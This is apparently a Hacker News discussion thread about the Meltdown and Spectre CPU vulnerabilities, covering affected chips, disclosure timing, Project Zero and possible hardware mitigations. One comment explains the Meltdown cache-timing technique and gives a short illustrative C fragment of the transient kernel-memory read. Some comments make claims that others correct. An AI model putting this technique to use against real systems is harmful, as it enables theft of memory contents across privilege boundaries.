We know that the scariest attack, "Meltdown", cannot be reproduced on AMD or ARM chips at all [1]. The second attack, "Spectre", is also greatly mitigated due to the neural network predicting pathways for the application. Thus it's unlikely/less likely that you'll be able to access other locations in memory [2]. However, it's definitely possible.

[1] https://meltdownattack.com/meltdown.pdf

[2] https://spectreattack.com/spectre.pdf


ARM advisory [1] does state that Cortex-A75 is vulnerable to variant 3 (Meltdown).

[1] https://developer.arm.com/support/security-update


Has anyone tried the Spectre PoC in the paper on ThreadRipper? I can confirm it works on my i7-7700K.


Sounds like maybe SOME ARM and SOME AMD are implicated, especially since the Android ARM CPUs appear to be fine...


There aren't really any special Android ARM CPUs; maybe they are confident it doesn't really work on Android because it's very difficult to get the timing precision and low-level assembly sequences in Java/ART-compiled code. Though I wonder how that squares with JNI.

I think the key to the statement is in any case that you need to differentiate between what is possible at the processor architecture level when you have full software control, and what is possible at an operating system level, where 3rd party applications are further restricted in various arbitrary ways (such as only being allowed to use Java, limited access to high-resolution timing primitives, etc.) that can make practical exploitation impossible, even if the flaw is present.

It's difficult to reason about because it's hard to tell if you can manipulate a JIT runtime into generating the code you need for the exploit to work - and as the JavaScript implementations show, the answer is often "yes".


JIT engines (and compilers) often generate familiar instruction patterns. Many JIT engines target specific languages (like JS) and as a result have "simpler" optimizers (less time to do this) and possibly more stable instruction patterns. So my money is on somebody fuzzing the required JS code.


You can develop Android applications in C/C++ using the NDK, thus, giving you full software control if needed.



Yeah, the Intel response page is filled with people claiming Intel is evil for even mentioning AMD.

https://news.ycombinator.com/item?id=16064545


To be fair, the Intel post alludes to collaborating with AMD/ARM on mitigating Spectre, but userspace memory leaking is wholly separate from kernel memory leaking (Meltdown, which only affects Intel processors).


It's a developing story, but from the information we have so far, it does look like Intel involving AMD is disingenuous, since AMD processors are not affected by the most serious of the issues.


It's too early to say which is ultimately the most serious in real-world terms.

From the Spectre note (which does affect AMD):

In addition to violating process isolation boundaries using native code, Spectre attacks can also be used to violate browser sandboxing, by mounting them via portable JavaScript code. We wrote a JavaScript program that successfully reads data from the address space of the browser process running it.

How quickly are we going to see attacks targeting BTC/ETH wallets, apps etc. on clients and cloud hosted exchanges?


Hardware wallet or bust right now, right? Use a private key that has never touched the internet?


Does Google have the best security team in the world? It seems like Google security is in a completely different league. I cannot imagine how this impacts companies handling fiat money or cryptocurrencies in the cloud, like Coinbase on AWS.


Project Zero is very well known for things exactly like this. Partially, it's because they are incredibly talented, but there are also talented people in academia and in other security consultancies. The biggest difference with Project Zero is that their primary [0] goal is altruistic: find vulnerabilities, and let people who can fix them know (vs publishing papers, securing paying clients, auctioning zero-days, etc), in the interests of making the internet and computing as a whole a safer place.

[0] Their secondary goals are to protect Google products and services, and to provide excellent PR in line with what we're discussing right here.


Worth noting that in this case, many of the authors are in academia. It wasn't solely a Google project.


I read it as an independent discovery by Project Zero and by academic researchers.


Independent discoveries don't happen overnight. Intel must have been aware of these vulnerabilities for some time.

edit: I'm sure everyone involved acted responsibly. I'm just curious as how far apart these independent discoveries were made.

The bug has been around forever, but it must have been discovered relatively recently since it's not fixed in hardware yet.

I've always been baffled by the concept of simultaneous discovery.


The Spectre paper includes this line in the acknowledgements:

> We would like to thank Intel for their professional handling of this issue through communicating a clear timeline and connecting all involved researchers.


So Google people and the Germans were working on the same thing without knowing of each other until Intel connected them?


Graz is in Austria, but considering these things are usually kept quiet quite long: probably yes


Google project zero blog says: We reported this issue to Intel, AMD and ARM on 2017-06-01


We talked about NSA and how people are leaving for greener pastures. Wondered two things:

1) Have any of them ended up in Project Zero or working on stuff like this

2) Wonder if NSA knew about this vulnerability and now someone there in a windowless office is sighing saying to themselves "Welp, another backdoor we can't use".


>their primary [0] goal is altruistic: ... making the internet and computing as a whole a safer place.

Which is, at the same time, highly rational: to secure their entire market.

It's nice to have big corp's incentives aligned with the public good. Too bad it happens so rarely.


Hm, that's tricky. These awesome findings didn't exactly provide net value for Google, not even over the not-so-short term (next 10 years?). They've created a large problem for Google! :-)


Yes and no. The cost of some malicious party figuring it out and using it against Google could potentially have been far greater than anything this could cost.


How much value would be destroyed if black hats discovered the bug first and people started discovering that information from their Google cloud VMs was getting leaked?

Sure, Google could just patch themselves, but the information to recreate the issue would surely be leaked by a xoogler, since it only takes a single sentence describing the vuln for a competent sec team to recreate it


Discovering a vulnerability is not creating it. A vulnerability exists even if it was not publicly disclosed. There were probably other people already exploiting it.


Imagine the lawsuit if Google failed to detect this....


Suppose you have a transportation company that owns 80% of the market share for everything transported on the roads. By car, van, truck, semi, everything.

Suppose your company also has a team that inspects public bridges to make sure they don't collapse.

Is it really altruistic, or given your market share is it a cost of business?


Oh, come on. Their only goal is to make Google money. The fact that they do useful work is a nice side effect, but if they didn't improve Google's security and give good PR there's not a chance in Hell Google would keep them around.


I don't know how you would evaluate such a thing as "best security team," but Project Zero certainly attracts a high calibre of security expert. If you're into breaking things, why wouldn't you want to break things with other bright people and the support of a massive corporation?


How about based on how many of the serious issues are found by Google. It has been one after another.


They're definitely world class, but they're also loud about it. Consider that other teams perhaps have a different model. For instance, Microsoft's internal team surely finds lots of clever bugs that never get talked about in Microsoft products.


I assume the NSA finds and quietly stockpiles some very clever vulnerabilities, too.


I can't imagine better marketing for cloud services than making it as clear as you can that the world is a very dangerous place for computers and if you don't have a crack team of hundreds of battle-hardened security engineers then you have no business hooking your computers up to the internet.


The irony here is that a good ol' dedicated hardware web server is far less susceptible to Meltdown or Spectre than Google Cloud, because only your code is running on the CPUs.

I predict tonight's disclosures will lead to an uptick in interest in running websites on dedicated hardware, like we did back at the turn of the century.


> Spectre

Spectre doesn't really care if it is cloud or bare metal. They are equally vulnerable unless disconnected from the internet.


To get you with Spectre, the attacker must be able to run code on your CPU.

This affects browsers with Javascript enabled because your Javascript engine runs foreign code on the CPU. The bad guy puts nasty code in a page, you visit the page, the code executes on your machine--boom.

And it affects public cloud web servers because multiple cloud servers (virtual machines) run on one CPU. So some attacker might be able to jump out of their VM and read your VM's memory.

BUT, on a dedicated hardware web server, there shouldn't be any foreign code running--no foreign VMs, and no browser.


There are many dedicated servers that are shared across users or clients and were expected to be isolated.

Any user who has access to a system (developers or support or sysadmins) has the ability to read arbitrary memory. The vulnerability can probably be leveraged for privilege escalation or to bypass the isolation.


Spectre doesn't let you do cross-VM memory reading; Meltdown does, AFAIK. If you want to read other VMs' memory, you need to RUN in those VMs yourself, within the right process.

So cloud instances and bare metal ones are equally vulnerable under Spectre: as long as they can transfer their malicious code to your VMs and run it. I can't really see how bare metal servers mitigate this problem.


Pretty hard to have a neighbor vm execute Spectre on your same physical server if you have dedicated hardware.

Add in that Spectre specifically is a js bug so in order to be vulnerable your server would need to execute untrusted JavaScript and I think we can assume the threat surface of this specific bug is smaller outside the cloud...


Pretty sure that it's not limited to js:

https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9...

It's a technique, not a flaw in js, from my understanding.


This PoC is implemented in js, but my point stands regardless of the language used. It requires code executing on the same physical server as your app in order to be an issue for you. Similar to a hypervisor escape (since we're being pedantic yes, I understand this is not a hypervisor escape), the evil neighbor surface is not present if you have no neighbors.


I don't think you understand the bug here.

1) https://spectreattack.com/: "Spectre tricks other applications into accessing arbitrary locations in their memory. " Spectre does not let you execute code in another guest

2) Spectre is not javascript specific. I am not sure why you think it is, beyond the fact a PoC was written in js


I don't think you understand my point. You should reread my post, especially the first sentence. It's first and alone for a reason; not sharing hardware is an effective mitigation against vulnerabilities in shared hardware.

Obviously it's not just a js bug, there are other PoCs in other languages.

I never said anything about executing code in another guest, not sure where you got that from.


>Pretty hard to have a neighbor vm execute Spectre on your same physical server if you have dedicated hardware.

You have no reason to care about a neighbor VM executing Spectre on the same physical server, since they're only hurting themselves, not you.

>Add in that Spectre specifically is a js bug so in order to be vulnerable your server would need to execute untrusted JavaScript and I think we can assume the threat surface of this specific bug is smaller outside the cloud...

"Spectre specifically is a js bug"


Spectre is exploitable from processes, not just containers... containers are equivalent to processes from its point of view, as the kernel is shared.

So... you may be able to go native to avoid having neighbours, but this does not prevent other processes exploiting your process. To do that you need to prevent any downloadable code from running.

This of course is possible and is the entire reason why the ARM document explains that most embedded systems are not affected due to the fact that they will not download and execute code (of any form).


Hmm, or maybe it's a reason to go with bare-metal providers :)


If true, how are edge computers going to connect to the cloud?


Chromebooks, obv. Integrated marketing strategy!


Also Android


Cloud services will benefit from this greatly.

Spectre occurs whether you are in the cloud or not, while cloud companies can advertise themselves as helping customers proactively mitigate such risks.


Did you forget the Technical University of Graz students who came up with rowhammer and KAISER in the first place?


Not really, they are mentioned in the article. What is fascinating is the number of discoveries by the Google team. The Wikipedia page has a summary of the prominent ones: https://en.wikipedia.org/wiki/Project_Zero_(Google) These are not bugs in obscure pieces of software but in major services and operating systems.


Come on, Google completely "forgets" to mention the others, whilst the others do mention Google who detected it independently. And then look who wrote the papers, exploits and patches.


> Come on, Google completely "forgets" to mention the others

Err… fourth paragraph:

> Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at: Spectre (variants 1 and 2) Meltdown (variant 3)


Yuval Yarom's contribution (Flush+Reload) seems quite understated, considering how important it is to the attack.


I wonder how much of it relates to their mastery in data science.

I keep wondering if they got some “””AI””” fuzzer that helps them a ton? Plus tons of compute power to spend (remember SHA-256 clash they found “just because”?)


No collision has been found in SHA-256. SHA-1 is the broken hash function


So, as I gather, one of the main culprits is that the unwinding of speculatively executed instructions is done incompletely. That is something that the people implementing the unwinding must have noticed and known. Somewhere the decision must have been made to unwind incompletely for some reason (performance/power/cost/time).

As for the difference between AMD and Intel (from other posts here, not this one): speculative execution can access arbitrary memory locations on Intel processors, while this is not possible on AMD. This means that on Intel processors you can probe any memory location with only limited privileges.

As for the affected AMD and ARM processors I'm none the wiser. How are they affected? Which models are affected? Does it allow some kind of privilege escalation? The next days will surely stay interesting.


You can't unwind completely. Once the cache is full, to load something into the cache, it has to evict something else. You might be able to evict what you just loaded, but you can't undo the earlier eviction.


Only if your speculative reads do cause irreversible side-effects on those caches. You could implement them in a way that doesn't modify the caches... but that would be complicated and probably use more power and have lower performance.


One of the main reasons for speculative execution is to fetch data into the caches ahead of them being needed. If you don't modify the cache, then you throw that away.

Maybe one way would be to use a smaller, separate cache for speculative execution and then copy that value to the regular cache once speculation is confirmed? This would add a one-cycle latency for the cache-to-cache transfer, but there might be better ways.


This might actually improve performance because it would prevent actually-hot data being evicted from the cache in favour of cold data that was loaded in a not-taken speculated branch.


No need for cache-to-cache transfer: just like with invisible registers, we could have cache line renaming.


It is not enough. The cache line still needs to be evicted from (or at least marked as no longer exclusive in) other CPUs, so the side effect is still visible.


There does not need to be a performance hit, but cache complexity must rise: speculative execution must use a separate cache for any data that was fetched speculatively. Only when that branch is truly accepted must that data enter the "real" cache. As long as speculative execution does not go on for too long, these secondary caches can stay really tiny (a handful of cache lines maybe).


The "speculation time" can be hundreds of cycles if you have a branch or memory read that takes a long time to resolve.

This problem is already solved with speculative writes to main memory - a speculative store buffer keeps a sequence of memory operations which need to be done when the operation retires. These buffers are very power hungry, because every future speculative read must check every entry in the speculative store buffer to see if it is re-reading a previously written address. That many to many mapping leads to an exponential amount of checking logic.

The same could be done for cache reads/writes, but I have a feeling it would quickly get very complex, large, and power hungry.


Those hundreds of cycles of speculative execution can't include more than a handful of cache modifications though, because a change to the caching state implies a miss in the speculated execution itself. So you can't have more than a small number of those before the original stall is over and the misprediction resolved.


What you are describing is simply plain associative memory. If I remember correctly, this is complex in its implementation, but does not grow exponentially. Please correct me if I am wrong.


Fully associative memory is generally very power hungry.

That's why CPU caches are usually "2-way associative" or "4-way associative".

That means the data you're looking for might be in one of 2 (or 4) places. Fully associative means the data you're looking for might be in any memory slot, and you're going to have to check them all. Checking them all in parallel is possible, so it isn't a speed issue, but it is a massive power issue. Average power use is the main limiting factor in CPUs today.

In general in a CPU, transistors which stay in the same state don't use much power. Transistors changing state use power. In a fully associative memory, the transistors doing the comparing change state with every comparison, whereas with a regular memory only the transistors for the individual bit of the memory being read or written change state and use power.

(the above is a simplification, but contains the key elements)


Associative memory is a huge matrix of AND gates in the comparator. But we are talking about buffering the results of speculated reads after a predicted branch.

The density of load instructions in code is not particularly high on average. Also, all loads are subject to the same latencies, so the chance that a speculative read completes before the blocking one is also low (it must be cached in a higher level cache, I think).

Taken together, I would be surprised if more than about 10 speculative reads can successfully complete at all in that time frame, even though it is hundreds of cycles. So that would be around 1000 AND gates and 1000 memory cells. Doesn't sound too big to me.


Unclear. From the Spectre paper:

More broadly, potential countermeasures limited to the memory cache are likely to be insufficient, since there are other ways that speculative execution can leak information. For example, timing effects from memory bus contention, DRAM row address selection status, availability of virtual registers, ALU activity, and the state of the branch predictor itself need to be considered.

... also ...

Of course, speculative execution will also affect conventional side channels, such as power and EM

Historically I think it's been assumed that you can't extract much useful information from a modern speculating CPU via EM radiation, but these attacks constantly seem to be surprising people. Re-programming a wifi chip to monitor interference generated by the CPU to spy on speculation? It would have sounded like a pie in the sky fantasy ... yesterday.


I will be highly impressed if anyone manages to pull off a reliable and generic side channel attack based on the hardware you listed. Most of what you describe is squarely in the realm of tinfoil hattery.

DRAM and the memory bus is also affected by DMA operations running independently of the CPU.

Power consumption? There is no hardware available to measure that, let alone at the time resolution required. If you have to first attach a GHz bandwidth oscilloscope to the computer you might as well just reboot it or dump its RAM contents or whatever.

Forget about reprogramming a Wi-Fi chip. They operate on narrow channels in the 2.4GHz range and have fixed hardware for modulation. You would at least have to force the CPU to switch to the right frequency and then be lucky enough that it radiates a signal that demodulated to something sensible within the Wi-Fi hardware. This is physically impossible on current hardware.

Also, on a different note, we cannot sacrifice performance willy-nilly for the sake of a bit of potential security gain. A 30% performance loss on servers means that the countermove is to consume 30% more power to maintain current levels of operation in a data center. This energy needs to be generated, which means that someone is burning oil or gas for it, with all the consequences. In essence, the current patches will result in an extra thousands or millions of tons of CO2 in the atmosphere. More efficient replacement hardware will eventually be produced, with extra environmental impact. We need to find ways to avoid that. Soon.


https://spectreattack.com/

Information site with some more information, and links to papers on the two vulnerabilities, called "Meltdown" and "Spectre" (with logos, of course).

(https://meltdownattack.com/ goes to the same site)


Both domains were registered on 2017-12-22. Given the planned disclosure on 9th January that Google mentions, MS and others coding patches silently [1], and the early reports [2] of kernel patches, does this mean that due to coding in the open the whole disclosure procedure has been vastly accelerated?

I wonder how the timing relates to New Year and many companies having holidays in CW1.

[1] https://lists.freebsd.org/pipermail/freebsd-security/2018-Ja...

[2] https://news.ycombinator.com/item?id=16046636


Accelerated, but not vastly. Google's post says "We reported this issue to Intel, AMD and ARM on 2017-06-01", so the embargo still ended up holding for 7 months, even with it ending a week early. The domain registration dates of 2017-12-22 seem to be just when Google started to prepare for releasing the publicity materials, not when the vulnerability was discovered.


The Google Security Blog post actually says that the open development did not cause the early breakdown of the embargo in the last 1-2 hours, but

> We are posting before an originally coordinated disclosure date of January 9, 2018 because of existing public reports and growing speculation in the press and security research community about the issue, which raises the risk of exploitation. The full Project Zero report is forthcoming.


The problem isn't "it's not brought forward by that much relatively" so much as that you have an agreed timeline to have coordinated patches (e.g. so one org doesn't push a fix before other orgs have). So if you have a bunch of orgs set up to do a release on day X, and then publish on X-[whatever], then you are effectively zero-daying.

Is it super important in this case? shrug.

But imagine for the sake of argument there was some undocumented cpu behaviour "if instruction x,y,z are executed in that order with these constants then catch fire", then having anyone pre-empt the agreed update time could be bad.


Sorry to be daft, but hasn't the Google Zero team jumped the gun on the coordinated disclosure date by publishing their blog post 6 days in advance?


Some researchers had independently created and demonstrated a working PoC, based on the Linux patches they saw, which read kernel memory from user space. At that point it was already public.

After that it's all about PR and getting people prepared for the magnitude and impact early.

Also to let people know that patches that were already available can be used (restarting GCP/AWS instances, site-per-process isolation in Chrome).


I feel like the Meltdown logo was done by a real designer, and Spectre was designed by a bored developer.


From the site:

> Both the Meltdown and Spectre logo are free to use, rights waived via CC0. Logos are designed by Natascha Eibl.


It says at the bottom they were both done by the same person.


That's funny, but also makes me wonder how you get contracted to do logos for things like this. Based strictly on her LinkedIn, she doesn't work for Google. Maybe a friend of someone? Kind of a cool gig though.


https://www.linkedin.com/feed/update/urn:li:activity:6354450...

says:

> Want to know what's really going on with the Intel security flaw everyone is talking about? Checkout https://meltdownattack.com to get all the details. This is my boyfriend's and his research team's latest work. An huge security breach which affects nearly all your computers! Stealing all your secrets never was that easy!


I thought the presence of a branch in the logo was clever.


I just noticed that. That is pretty clever.


It seems that Richard Stallman is not so paranoid after all:

> I am careful in how I use the Internet.

> I generally do not connect to web sites from my own machine, aside from a few sites I have some special relationship with. I usually fetch web pages from other sites by sending mail to a program (see https://git.savannah.gnu.org/git/womb/hacks.git) that fetches them, much like wget, and then mails them back to me. Then I look at them using a web browser, unless it is easy to see the text in the HTML page directly. I usually try lynx first, then a graphical browser if the page needs it (using konqueror, which won't fetch from other sites in such a situation).

Ref: https://stallman.org/stallman-computing.html


[flagged]


>RMS remains a rambling nutjob and none of this is really applicable to the issue at hand.

Ramblings that this industry has repeatedly proven to be correct, and continues to do so. I'd take his ramblings over a cheap ad hominem any day.

I encourage you to try being more civil the next time you comment on this site.


A "rambling nutjob" that has been proven correct time and time and time again.

We need more people with RMS-type views in Google, Facebook, etc.


The Spectre attack is exploitable via JavaScript and there's no software patch that can fix it. IoW, it is not possible to safely run untrusted code on the same computer that has sensitive information.


Well he was right about the Intel ME vulnerabilities


Speculative execution seems like something that would be very intuitively insecure, even to a layperson (relative to the field, of course).

I'm wondering, was this vulnerability theorized first and later found out to be an actual vulnerability? Or was this something that nobody had any clue about?

I'm only saying this, because from a security perspective, I imagine somewhere at some point very early on someone had to have pointed out the potential for something like speculative execution to eventually cause security problems.

I just don't understand how chip designers assumed speculative execution wouldn't eventually cause security problems. Is it because chip designers were prioritizing performance above security?


A long time ago, in a faraway office park, there was an intense discussion over so-called "flag early" and "flag after" designs.

The flag early camp's argument was: protected pages should not be allowed to be fetched to begin with by any insecure execution flow, and we need to pagefault before speculative execution.

The "flag after" camp was all for post-factum pagefaulting when the branch has finished execution, so you do not need to pagefault for every branch, and only do it for the branch that has "won".

Chip design magazines from the nineties have all that well covered.


Speculative execution isn't supposed to leak information; if the speculative instructions aren't supposed to execute, all traces of them should be rolled back. I'd be curious to see what the details of this bug really are. I'm not sure how much will be disclosed in the interests of keeping exploits from popping up.


"all traces" includes timing differences in execution of non-privileged code, which it turns out are not rolled back.


Or side-effects by loading data into the cache hierarchy.


According to this comment, it has been theorized for quite some time:

https://news.ycombinator.com/item?id=16066165

With this particular computer scientist, who talked about this problem before, referenced in Google's paper:

http://www.cs.binghamton.edu/~dima/



Incredible that in this day and age chip designers do not prioritize security over performance.


I think the chip designers never thought of security much:

https://news.ycombinator.com/item?id=16062223

It's a similar situation to other timing attacks, which have been around practically as long as caches.


I don't think this is the last we have seen of side channels; it's just a ridiculously hard problem to get right. And for that reason I can't feel too angry at the processor makers.

And I certainly expect to see more things like this (but hopefully at least with lower bandwidth).



Wow. So Intel comes out and says "what is all the panic about, there is nothing wrong" (despite knowing about this), then Amazon drops the "we are updating everything right now" bomb, and then Google drops the mother of all CPU bugs. In a previous thread someone was asking if it really is all that bad, and at this point I think it's safe to say that yeah, it is.


So, is AMD effected or not? This seems fairly important. The Google blog post sort of goes against itself in this regard. AMD itself has said:

"The threat and the response to the three variants differ by microprocessor company, and AMD is not susceptible to all three variants. Due to differences in AMD's architecture, we believe there is a near zero risk to AMD processors at this time."

So either AMD is lying or Google's blog post is wrong. Granted AMD's statement is a bit muddled, not sure if they mean they aren't susceptible to all THREE variants (as in only 1/3) or they aren't susceptible to ALL three variants (as in none of them.)


As almost everyone seems to be getting this wrong: It's "affected", not "effected". "effected" means roughly "caused", while "affected" means roughly "influenced".


AMD is saying that:

  !(susceptible_v1 && susceptible_v2 && susceptible_v3)
They are not saying that:

  !susceptible_v1 && !susceptible_v2 && !susceptible_v3
(the latter would be rendered in English as: "AMD is not susceptible to any of the three variants")


You've successfully made it less clear.

There is a nice table on AMD's website though:

https://www.amd.com/en/corporate/speculative-execution


It seems like it is not affected by the most serious bug, but may be by a lesser one.


That's what I'm thinking: affected by Spectre, but not by Meltdown. But more clarity would be appreciated on Google's and AMD's front. I mean, from a pure PR angle, AMD has a lot to gain if they can clear the air more.


It is affected by Spectre, but not by the other.


From the Spectre paper-

We have empirically verified the vulnerability of several Intel processors to Spectre attacks, including Ivy Bridge, Haswell and Skylake based processors. We have also verified the attack's applicability to AMD Ryzen CPUs. Finally, we have also successfully mounted Spectre attacks on several Samsung and Qualcomm processors (which use an ARM architecture) found in popular mobile phones.

So in other words, the researchers haven't tried it on AMD processors, but they think the attack would work. AMD, on the other hand, is saying the attack won't work.

Frankly, I believe in PoC||GTFO, so AMD is safe in my book for now.


Spectre and Meltdown are two different exploits. In this case, the paper is talking about Spectre, and they did have a PoC that worked on all three major processor families (except for deterministic execution engines in microcontrollers and low-end CPUs from ARM, as well as a few early Atoms from Intel). AMD is saying that Meltdown, which at first glance seems like the most serious one, doesn't affect their processors.


I read the Spectre paper front to back. Where did the paper mention that they have a working PoC for AMD x86 CPUs?


That seems like a rather fragile interpretation of the statement. I had interpreted it to mean they tried the attack on Ryzen and it worked. Given the general nature of their technique why would it not work on AMD chips?


Can someone with a little more experience this low-level let me know if this is as bad as I think it is?

Because this looks real bad:

> Reading host memory from a KVM guest


"We wrote a JavaScript program that successfully reads data from the address space of the browser process running it."

Yeah, it's pretty bad.


A perfect occasion to invite others into my current exercise of using the web without JavaScript.


...and for those of us who leave JS off by default except for a few very trusted sites, the bar for turning on JS for a site that asks for it just went up a lot higher.



So is speculative execution just inherently flawed like this, or can we expect chips in 2 years that let operating systems go back to the old TLB behavior?


Yeah I was wondering this myself. Even if there's some fiddly hardware fix to make speculative execution secure, how much of its performance gains will we have to give up to get there?


Speculative execution as a concept should not be flawed. My take is that the results of illegal speculation should never be leaked in a visible way.


As I read through the Meltdown paper, it looks really difficult to have the security we want and the performance we want at the same time. It's pretty crazy, but here's my limited understanding:

There's a huge shared buffer between two threads: 256 * 4K. One thread speculatively reads a byte of kernel memory, literally any byte it wants, and then uses that byte's value as an index to read one of those 256 pages from the buffer, which pulls the page corresponding to the byte it just read into the cache. Then at some point the CPU determines that the thread shouldn't be permitted to access the kernel memory location and rolls back all of that speculative execution, but the cached memory page isn't affected by the rollback.

The other thread iterates through those 256 pages, timing how long it takes to read from each page, and the one page that Thread A accessed will have a shorter timing because it's already cached. It now knows one byte of kernel memory that it shouldn't. That's just one byte, but the whole process is so fast that it's easy to just go nuts on the whole kernel address space.
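
A minimal sketch of the transient sequence in C (illustrative only: `kernel_ptr` and `probe` are made-up names, and a real PoC additionally needs exception suppression and a cycle-accurate timer):

  // 'probe' is the shared 256 * 4096 byte user-space buffer.
  // The first load faults, but before the fault is delivered the
  // dependent load may already have pulled one probe page into cache:
  unsigned char secret = *(volatile unsigned char *)kernel_ptr;
  volatile unsigned char dummy = probe[secret * 4096];
  // After the rollback, timing reads of probe[i * 4096] for i = 0..255
  // reveal which page is cached, i.e. the value of 'secret'.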

So what would the fixes be? Disable speculative execution? Only do it if the target memory location is within userspace, or within the same space as the executing address? Plug all of the sideband information leak mechanisms? I dunno.


Keep a small pool of cache lines exclusive to speculative execution; discard them when the speculation is not taken, and rename the affected cache lines (like register renaming, so no copy) when it is.


Also, a separate BTB for each process and privilege level.


Yes, and this would have the bonus effect of actually gaining IPC in multi-process loads.


In the simplest Meltdown case, the offending instruction is really executed and a page fault occurs. That is handled in the kernel, which at that point could (simply?) flush all caches to remove the leaked information.

The real problem with Meltdown seems to occur when:

1) The offending instruction is NOT really executed because it is in a branch which is not actually taken.

2) The offending instruction is executed but within a transaction, which leads to an exception-free rollback (with leaked information left in cache though).

AFAIK neither is (or can be made) visible to the kernel (which could explain the very large PTI patch), but I do wonder if they are events that can be handled at the microcode level, in which case a microcode update from Intel could mitigate them.


The MELTDOWN one is the easy one (as is evident by the fact that this is the one that only seems to affect Intel CPUs).

When a load is found to be illegal, an exception flag is set so that if the instruction is retired (i.e., the speculated execution is found to be the actual path taken), a page fault exception can be raised. To prevent MELTDOWN, at the same time that the flag is raised you can set the result of the load to zero.

SPECTRE is the really hard one to deal with. Part of the solution might be providing a way for software to flush the branch predictor state.


Maybe separate BTBs. Or maybe disable branch target prediction when in kernel mode (but then some VM process may still observe some other process running inside a different VM via a side channel).


Don't allow user processes to recover from a SEGV. The attack depends on a signal handler that traps the signal and resumes execution. If this is disabled then the attack will not work. This would affect two types of systems:

1. Badly written code where bugs are being masked by the handler.

2. Any kind of virtualization?

So, for cloud providers it looks like a 30% performance hit, but for the rest of us I would rather have a patch that stops applications handling the SEGV trap.


The attacks do not rely on recovering from SIGSEGV. The speculated execution that accesses out-of-bounds or beyond privilege level happens in a branch that's predicted-taken but actually not-taken, so the exception never occurs.


Ah, ok - then I read the paper wrongly. I'll go back and have another look.

Edit: yes, I missed the details in section 4.1 when I skimmed through. I'm not familiar with the Kocher paper, but I assume the training looks like this?

  for (int i = 0; i < n; i++)
      if (i == n - 1)
          do_probe();


After thinking about this, I think you may be right. It might be hard (or impossible) to do in practice.

> or within the same space as the executing address

That's probably a good place to start from. I'm guessing there would still be issues here with JITed code coming from an untrusted source.


I can imagine some ways to armor the branch predictor, similar in principle to how languages like Perl have to include a random seed in their hash code (in some circumstances) to prevent attackers from pre-computing values that will all hash to the same thing [1]. There should be some ways to relatively cheaply and periodically inject such randomization into the prediction system, enough to prevent that aspect of the attack. This will cost something, but probably not be noticeable to even the most performance-sensitive consumers.

But no solution leaps to mind for the problem of preventing speculative code from leaking things via cache, short of entirely preventing speculating code from being able to load things into the cache. If nobody can come up with a solution for that, that's going to cost us something to close that side channel. Not sure what though, without a really thorough profiling run.

And I'd put my metaphorical $5 down on someone finding another side channel from the speculative code; interactions with changing processor flags in a speculative execution, or interaction with some forgotten feature [2] where the speculation ends up incorrectly undone or something.

Yuck.

[1]: https://blog.booking.com/hardening-perls-hash-function.html

[2]: https://www.youtube.com/watch?v=lR0nh-TdpVg - The Memory Sinkhole - Unleashing An X86 Design Flaw Allowing Universal Privilege Escalation (Dec 29, 2015)


I'm thinking you might be right.

It's going to be really hard to give up the real-world gains from branch prediction. Branch prediction can make a lot of real-world code (read "not the finest code in the world") run at reasonable speeds. Another common pattern to give up would be eliding (branch-predicting away) nil reference checks.

> short of entirely preventing speculating code from being able to load things into the cache

Some new server processors allow us to partition the cache (to prevent noisy neighbors) [1, 2]. I don't have experience working with this technology, but everything I read makes me believe this mechanism can work on a per-process basis.

If that kind of complexity is already possible in CPU cache hierarchy I wonder if it's possible to implement per process cache encryption. New processors (EPYC) can already use different encryption keys for each VM, so it might be a matter of time till this is extended further.

[1] https://danluu.com/intel-cat/

[2] https://lwn.net/Articles/694800/


This rant/thread is good reading as well: https://lkml.org/lkml/2018/1/3/797

It's possible to key the cache in the kernel on CPL so at least there should be no user / kernel space scooping of cache lines.

It's possible we can never fully prevent all attacks in the same address space. So certain types of applications (JITs and sandboxes) might forever be a cat-and-mouse game, since we're unlikely to give up on branch prediction.


AFAICT injecting any sort of delay that prevents this attack would also completely negate any benefit from caches and that would take us back to 2000s performance at best, even with 10-16 core Xeon monsters. The branch predictor is really just a glorified cache prefetcher so you'd not only have to harden the branch predictor but anything that could possibly access the cache lines that the branch predictor has pulled up.


"The branch predictor is really just a glorified cache prefetcher so you'd not only have to harden the branch predictor..."

I was just thinking of the part they were talking about where it was too predictable, not the rest of the issues. Instead of a single hard-coded algorithm we could switch to something that has a random key element, like XOR'ing a rotating key instead of a hard-coded one, similar to some of the super-basic hashing some predictors already do. Prefetching I just don't know what to do with. I mentally started down the path of considering what it would take for the CPU to pretend the page was never cached in the first place on a misprediction, but yeow, that got complicated fast, between cache coherency issues between processors and all of the other crap going on there, plus the fact that there's just no time when we're talking about CPU and L1 interactions.

Timing attacks really blow. Despite the "boil the ocean" nature of what I'm about to say, I find myself wondering if we aren't better served by developing Rust and other stronger things to the point that even if the system is still vulnerable to timing attacks, it's so strong everywhere else that it's a manageable problem. Maybe tack on some heuristics to try to deal with obvious hack attempts and at least raise the bar a bit. More process isolation (as in other links mtanski gives, you can at least confine this to a process). (What if Erlang processes could truly be OS processes as far as the CPU was concerned?) I'm not saying that is anything even remotely resembling easy... I'm saying that it might still be easier than trying to prevent timing attacks like this. That's a statement about the difficulty of fixing timing attacks in general, not the ease of "hey, everybody, what if you just wrote code better?", a "solution" I often make fun of myself.


Only on Intel. Others restrict prefetches based on permissions.

I think this might even be fixable by microcode patches on Intel, at least OS-specific ones, looking at the first address bit.


If they could have done microcode patches they would have done so, suggesting they can't.


SUSE already has them.

I guess Intel only focused on Windows NT for several months, and there it's not as easy as on Linux.


So this confirms the suspicion that the bug allows VM-to-VM disclosure of memory, which would conclusively explain the rush.


What are the odds that the NSA already knew about this? Roughly 100%?


This is a toughie. These bugs are basically very difficult to mitigate completely without fixes at the hardware level. One might imagine the NSA being coy and patching their own OS's et al to the degree they can while working to exploit the bug in the wild. However, the reality is that this bug is almost worse for the NSA than for most other folks, because they have the most to lose if their security is breached. And they have a lot of machines out there. The idea of a bug of this severity that leaves no traces is probably leaving a lot of people at the NSA in cold sweats right now. Meaning that if they did discover it before other researchers it's questionable whether they would have tried to exploit it vs. driving towards the most rapid possible mitigation and fix.


Pretty close to 100%.

Google Project Zero and academic researchers found it independently, following some talk about the concept a while back.

The three-letter agencies have people of the same calibre working full time on this. They could find it too.


